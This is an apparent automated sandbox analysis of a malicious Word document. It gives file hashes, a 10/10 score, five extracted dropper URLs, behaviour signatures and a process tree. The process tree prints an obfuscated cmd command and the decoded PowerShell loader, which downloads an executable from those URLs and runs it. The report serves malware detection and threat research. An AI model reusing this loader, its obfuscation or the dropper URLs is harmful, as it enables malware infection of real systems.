Overview

overview

10

Static

static

8

ab37d198e0...c4.doc

windows7_x64

10

ab37d198e0...c4.doc

windows10-2004_x64

10

Analysis

  • max time kernel
    112s
  • max time network
    138s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    21-05-2022 00:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ab37d198e0a1aa5ea37a6a4ebfccf8f6f175f3e97f77261b9a4813a4c7e2c1c4.doc

  • Size

    141KB

  • MD5

    d2cc5525e1d27ab1814bf89562efd8d9

  • SHA1

    278d0e253423ba2e83f1b3851465251c209a8580

  • SHA256

    ab37d198e0a1aa5ea37a6a4ebfccf8f6f175f3e97f77261b9a4813a4c7e2c1c4

  • SHA512

    59725072fd48b6853e938ad289b8fe893fa48f61a0a0f5e3c377ba85f63514b55577b78e6bf7a3bd32b8d46a5f400805b64dd51965ed431f76a2d19a46a01191

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.niteshagrico.com/z7ISltpB
exe.dropper

http://www.tenmiengiarenhat.com/bIfcRi8Kc
exe.dropper

http://www.hopeintlschool.org/ebIV1do
exe.dropper

http://www.dnenes.com.mx/Wmv9Lwru
exe.dropper

http://kynangtuhoc.com/h6pTDOH

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ab37d198e0a1aa5ea37a6a4ebfccf8f6f175f3e97f77261b9a4813a4c7e2c1c4.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1752
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2036
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c %PrOgRamdATa:~0,1%%pRoGramDaTA:~9,2% /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^% EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p [O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres? unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres? unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | %tmP:~-8,-7%%appdATA:~-4,1%D "
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:524
        • C:\Windows\SysWOW64\cmd.exe
          CmD /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^% EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p [O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres? unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres? unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | cmD "
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:432
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" ecHO %3fr% "
            4⤵
              PID:344
            • C:\Windows\SysWOW64\cmd.exe
              cmD
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1400
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell $onlinewt='moderatorvr';$InvestmentAccountos=new-object Net.WebClient;$Ergonomicvs='http://www.niteshagrico.com/z7ISltpB@http://www.tenmiengiarenhat.com/bIfcRi8Kc@http://www.hopeintlschool.org/ebIV1do@http://www.dnenes.com.mx/Wmv9Lwru@http://kynangtuhoc.com/h6pTDOH'.Split('@');$GroceryAutomotiveAutomotivews='ROIso';$SmallFreshTunaaj = '224';$MoneyMarketAccountir='plugandplaywz';$HeardIslandandMcDonaldIslandski=$env:public+'\'+$SmallFreshTunaaj+'.exe';foreach($depositpq in $Ergonomicvs){try{$InvestmentAccountos.DownloadFile($depositpq, $HeardIslandandMcDonaldIslandski);$generatingjk='initiativeshi';If ((Get-Item $HeardIslandandMcDonaldIslandski).length -ge 80000) {Invoke-Item $HeardIslandandMcDonaldIslandski;$PersonalLoanAccountrf='Automotivevz';break;}}catch{}}$paradigmsdc='IncredibleConcreteKeyboardal';
                5⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:848

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Modify Registry

      1
      T1112

      Credential Access

      Discovery

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/344-65-0x0000000000000000-mapping.dmp
        Download
      • memory/432-64-0x0000000000000000-mapping.dmp
        Download
      • memory/524-63-0x0000000000000000-mapping.dmp
        Download
      • memory/848-70-0x0000000004BA0000-0x00000000051F1000-memory.dmp
        Filesize

        6.3MB

        Download
      • memory/848-69-0x000000006AB20000-0x000000006B0CB000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/848-67-0x0000000000000000-mapping.dmp
        Download
      • memory/1400-66-0x0000000000000000-mapping.dmp
        Download
      • memory/1752-58-0x00000000750C1000-0x00000000750C3000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1752-62-0x00000000007C7000-0x00000000007E8000-memory.dmp
        Filesize

        132KB

        Download
      • memory/1752-61-0x00000000007C7000-0x00000000007E8000-memory.dmp
        Filesize

        132KB

        Download
      • memory/1752-54-0x0000000072671000-0x0000000072674000-memory.dmp
        Filesize

        12KB

        Download
      • memory/1752-57-0x00000000710DD000-0x00000000710E8000-memory.dmp
        Filesize

        44KB

        Download
      • memory/1752-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

        Download
      • memory/1752-55-0x00000000700F1000-0x00000000700F3000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1752-71-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

        Download
      • memory/2036-60-0x000007FEFBD21000-0x000007FEFBD23000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2036-59-0x0000000000000000-mapping.dmp
        Download